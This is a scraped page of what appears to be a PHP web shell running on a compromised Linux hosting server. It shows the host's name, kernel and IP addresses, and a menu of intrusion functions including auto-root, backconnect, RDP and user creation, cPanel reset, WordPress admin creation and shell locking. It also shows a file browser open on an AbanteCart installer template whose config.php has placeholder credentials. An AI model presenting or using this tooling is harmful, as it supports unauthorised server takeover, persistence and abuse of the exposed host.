Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.223.170.253
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
abante /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
5.93
KB
-rw-r--r--
clone.php
6.34
KB
-rw-r--r--
config.php
1.4
KB
-rw-r--r--
edit.php
5.25
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
1.9
KB
-rw-r--r--
fileindex.php
212
B
-rw-r--r--
import.php
5.03
KB
-rw-r--r--
info.xml
3.55
KB
-rw-r--r--
install.js
1.02
KB
-rw-r--r--
install.php
8.05
KB
-rw-r--r--
install.xml
1.63
KB
-rw-r--r--
md5
4.25
KB
-rw-r--r--
notes.txt
509
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** AbanteCart, Ideal OpenSource Ecommerce Solution https://www.AbanteCart.com Copyright © 2011-2024 Belavier Commerce LLC Released under the Open Software License (OSL 3.0) */ const SERVER_NAME = '[[domhost]]'; // Admin Section Configuration. You can change this value to any name. Will use ?s=name to access the admin const ADMIN_PATH = '[[admin_realname]]'; // Database Configuration const DB_DRIVER = 'amysqli'; const DB_HOSTNAME = '[[softdbhost]]'; const DB_USERNAME = '[[softdbuser]]'; const DB_PASSWORD = '[[softdbpass]]'; const DB_DATABASE = '[[softdb]]'; const DB_PREFIX = '[[dbprefix]]'; const CACHE_DRIVER = 'file'; // Unique AbanteCart store ID const UNIQUE_ID = '[[UNIQUE_ID]]'; // Encryption key for protecting sensitive information. NOTE: Change of this key will cause a loss of all existing encrypted information! const ENCRYPTION_KEY = '[[ENCRYPTION_KEY]]'; // details about allowed DSN settings https://symfony.com/doc/6.0/mailer.html#transport-setup /* const MAILER = [ //'dsn' => null, // OR 'protocol' => 'smtp', // or ses+smtp, gmail+smtp, mandrill+smtp, mailgun+smtp, mailjet+smtp, postmark+smtp, sendgrid+smtp, sendinblue+smtp, ohmysmtp+smtp //we use "username" also as ID, KEY, API_TOKEN, ACCESS_KEY 'username' => 'merchant@yourdomain.com', 'password' => '****super-secret-password****', 'host' => 'your-hostname', 'port' => 465 //or 587 etc ]; */
Close